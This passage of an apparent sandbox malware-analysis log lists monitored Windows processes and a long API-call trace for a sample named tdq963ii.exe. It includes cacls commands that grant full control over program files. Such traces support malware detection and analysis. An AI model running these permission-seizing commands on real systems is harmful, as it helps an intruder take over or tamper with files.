lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.978] exit (_Code=1) Process: id = "141" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x36dde000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 635 os_tid = 0x85c Thread: id = 640 os_tid = 0x540 Thread: id = 641 os_tid = 0x8ac Process: id = "142" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x3669d000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0xb10" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 636 os_tid = 0xa84 Process: id = "143" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x36592000" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "132" os_parent_pid = "0x7b0" cmd_line = "cacls \"C:\\Program Files\\MSBuild\\executed_florists.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 639 os_tid = 0x7c4 Process: id = "144" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x360de000" os_pid = "0x600" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x9e0" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 642 os_tid = 0x798 [0148.816] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0148.817] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0148.817] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0148.817] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0148.817] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0148.818] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0148.818] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0148.818] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0148.818] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0148.819] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0148.819] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0148.819] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0148.820] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0148.820] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0148.820] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0148.820] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0148.821] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0148.821] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0148.821] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0148.821] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0148.822] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0148.822] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0148.822] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0148.822] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0148.823] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0148.823] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0148.823] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0148.823] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0148.824] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0148.824] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0148.824] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0148.824] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0148.825] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0148.825] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0148.825] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0148.825] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0148.825] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0148.826] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.827] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0148.828] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0148.828] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0148.828] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0148.828] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0148.829] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0148.830] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0148.831] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0148.831] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0148.831] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0148.831] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0148.831] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0148.832] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0148.832] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0148.832] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0148.832] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0148.833] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0148.833] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0148.833] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0148.833] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0148.834] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0148.835] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0148.835] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0148.835] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0148.835] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0148.835] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0148.835] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0148.836] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0148.837] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0148.838] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0148.838] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0148.838] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0148.838] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0148.839] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0148.839] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0148.839] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0148.839] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0148.839] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0148.839] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0148.839] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0148.840] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0148.840] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0148.840] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0148.840] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0148.840] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0148.841] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0148.841] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0148.841] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0148.841] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0148.841] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0148.842] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0148.842] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0148.842] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0149.155] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0149.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x1627b080, dwHighDateTime=0x1d68287)) [0149.193] GetCurrentThreadId () returned 0x798 [0149.193] GetCurrentProcessId () returned 0x600 [0149.194] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=26953254063) returned 1 [0149.198] GetProcessHeap () returned 0x530000 [0149.826] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0149.827] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0149.827] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0149.827] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0149.828] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0149.829] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0149.830] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0149.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0149.830] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0149.830] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0149.830] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0149.831] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0149.832] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0152.081] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3bc) returned 0x5470a0 [0152.082] GetCurrentThreadId () returned 0x798 [0152.082] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x547468 [0152.082] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x547488 [0152.083] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x517b378a, hStdError=0x0)) [0152.083] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0152.083] GetFileType (hFile=0x3) returned 0x2 [0152.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.084] GetFileType (hFile=0x7) returned 0x2 [0152.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0152.084] GetFileType (hFile=0xb) returned 0x2 [0152.085] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0152.085] GetEnvironmentStringsW () returned 0x547c90* [0152.086] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb84) returned 0x548820 [0152.089] FreeEnvironmentStringsW (penv=0x547c90) returned 1 [0152.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0152.090] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x94) returned 0x547c90 [0152.093] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa0) returned 0x547d30 [0152.093] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x544dd0 [0152.096] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x547dd8 [0152.096] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6e) returned 0x547e50 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x78) returned 0x53f900 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x547ec8 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x547f38 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x547f70 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x547fc0 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x547ff0 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x546a70 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4a) returned 0x548020 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x53f980 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548078 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x5480b0 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1c) returned 0x546a98 [0152.097] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x5480e8 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x7c) returned 0x5481c8 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x548250 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3a) returned 0x544e18 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x90) returned 0x548290 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x548328 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548358 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x548390 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5483d0 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548420 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544e60 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x548480 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x82) returned 0x5484a0 [0152.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x548530 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x546ac0 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x548568 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5485a0 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x548600 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x548660 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x544ea8 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x548698 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x5486f8 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x548728 [0152.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8c) returned 0x548760 [0152.099] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548820 | out: hHeap=0x530000) returned 1 [0154.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x5487f8 [0154.593] GetLastError () returned 0x0 [0154.596] SetLastError (dwErrCode=0x0) [0154.597] GetLastError () returned 0x0 [0154.597] SetLastError (dwErrCode=0x0) [0154.597] GetLastError () returned 0x0 [0154.597] SetLastError (dwErrCode=0x0) [0154.598] GetACP () returned 0x4e4 [0154.598] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x220) returned 0x549000 [0154.598] GetLastError () returned 0x0 [0154.598] SetLastError (dwErrCode=0x0) [0154.598] IsValidCodePage (CodePage=0x4e4) returned 1 [0154.598] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0154.601] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0154.604] GetLastError () returned 0x0 [0154.605] SetLastError (dwErrCode=0x0) [0154.605] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0154.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 